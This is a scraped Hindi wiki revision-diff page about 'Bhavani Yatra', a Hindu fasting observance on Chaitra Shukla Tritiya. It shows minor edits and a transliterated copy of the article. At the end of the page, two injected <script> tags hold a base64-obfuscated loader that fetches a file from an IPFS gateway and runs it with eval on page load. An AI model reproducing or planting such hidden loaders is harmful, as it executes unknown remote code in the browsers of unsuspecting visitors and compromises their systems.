Difference between revisions of "भवानी यात्रा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replace - ")</ref" to "</ref")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[चैत्र]] [[शुक्ल पक्ष|शुक्ल]] [[तृतीया]] पर मनाया जाता है।  
 
*[[चैत्र]] [[शुक्ल पक्ष|शुक्ल]] [[तृतीया]] पर मनाया जाता है।  
 
*इस व्रत पर 108 प्रदक्षिणाएँ की जाती है; जागर (जागरण) किया जाता है।  
 
*इस व्रत पर 108 प्रदक्षिणाएँ की जाती है; जागर (जागरण) किया जाता है।  
*दूसरे दिन भवानी पूजा की जाती है <ref>स्मृतिकौस्तुभ (94)</ref>; <ref>पुरुषार्थचिन्तामणि (109)</ref>; <ref>वर्षकृत्यदीपक (43)</ref>।
+
*दूसरे दिन भवानी पूजा की जाती है <ref>स्मृतिकौस्तुभ (94</ref>; <ref>पुरुषार्थचिन्तामणि (109</ref>; <ref>वर्षकृत्यदीपक (43</ref>।
  
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:48, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr shukl tritiya par manaya jata hai.
  • is vrat par 108 pradakshinaean ki jati hai; jagar (jagaran) kiya jata hai.
  • doosare din bhavani pooja ki jati hai [1]; [2]; [3].



tika tippani aur sandarbh

  1. smritikaustubh (94
  2. purusharthachintamani (109
  3. varshakrityadipak (43

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>